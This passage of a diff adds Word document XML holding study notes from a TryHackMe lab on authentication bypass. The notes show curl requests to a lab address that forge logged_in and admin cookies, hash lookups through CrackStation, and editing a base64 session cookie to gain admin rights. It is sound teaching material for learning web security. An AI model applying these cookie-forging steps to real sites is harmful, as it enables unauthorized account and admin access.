+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Examining and editing the cookies set by the web server during your online session can have multiple outcomes, such as unauthenticated access, access to another user's account, or elevated privileges. If you need a refresher on cookies, check out the </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId58" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>HTTP In Detail</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> room on task 6.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Plain Text</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>The contents of some cookies can be in plain text, and it is obvious what they do. Take, for example, if these were the cookie set after a successful login:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Set-Cookie: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>logged_in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=true; Max-Age=3600; Path=/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+        <w:t>Set-Cookie: admin=false; Max-Age=3600; Path=/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>We see one cookie (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>logged_in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">), which appears to control whether the user is currently logged in or not, and another (admin), which controls whether the visitor has admin privileges. Using this logic, if we were to change the contents of the cookies and make a </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>request</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we'll be able to change our privileges.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>First, we'll start just by requesting the target page:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Curl Request 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user@tryhackme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ curl http://10.10.238.42/cookie-test</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>We can see we are returned a message of: Not Logged In</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now we'll send another request with the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>logged_in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cookie set to true and the admin cookie set to false:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Curl Request 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user@tryhackme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ curl -H "Cookie: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>logged_in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=true; admin=false" http://10.10.238.42/cookie-test</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">We are given the message: Logged </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>In</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>As</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> User</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Finally, we'll send one last request setting both the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>logged_in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and admin cookie to true:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Curl Request 3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user@tryhackme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ curl -H "Cookie: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>logged_in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=true; admin=true" http://10.10.238.42/cookie-test</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">This returns the result: Logged </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>In</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>As</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>An</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Admin as well as a flag which you can use to answer question one.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Hashing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sometimes cookie values can look like a long string of random characters; these are called hashes which are an irreversible representation of the original text. Here are some examples that you may come across:</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="14313" w:type="dxa"/>
+        <w:tblCellMar>
+          <w:left w:w="0" w:type="dxa"/>
+          <w:right w:w="0" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="786"/>
+        <w:gridCol w:w="799"/>
+        <w:gridCol w:w="15056"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Original String</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Hash Method</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Output</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>md5</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>c4ca4238a0b923820dcc509a6f75849b</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>sha-256</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>sha-512</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:bottom w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:bottom w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>sha1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:bottom w:val="nil"/>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>356a192b7913b04c54574d18c28d46e6395428ab</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>You can see from the above table that the hash output from the same input string can significantly differ depending on the hash method in use. Even though the hash is irreversible, the same output is produced every time, which is helpful for us as services such as </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId59" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>https://crackstation.net/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> keep databases of billions of hashes and their original strings.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Encoding</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Encoding is similar to hashing in that it creates what would seem to be a random string of text, but in fact, the encoding is reversible. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>So</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it begs the question, what is the point in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>encoding? Encoding allows us to convert binary data into human-readable text that can be easily and safely transmitted over mediums that only support plain text ASCII characters.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+        <w:t>Common encoding types are base32 which converts binary data to the characters A-Z and 2-7, and base64 which converts using the characters a-z, A-Z, 0-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>9,+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>, / and the equals sign for padding.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+        <w:t>Take the below data as an example which is set by the web server upon logging in:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>This string base64 decoded has the value of {"id":1,"admin": false} we can then encode this back to base64 encoded again but instead setting the admin value to true, which now gives us admin access.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>5-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
+          <w:color w:val="F9F9FB"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:highlight w:val="green"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>IDOR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId60" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>https://medium.com/@wiktorderda/idor-tryhackme-walkthrough-7369f7a34e9</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>a-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
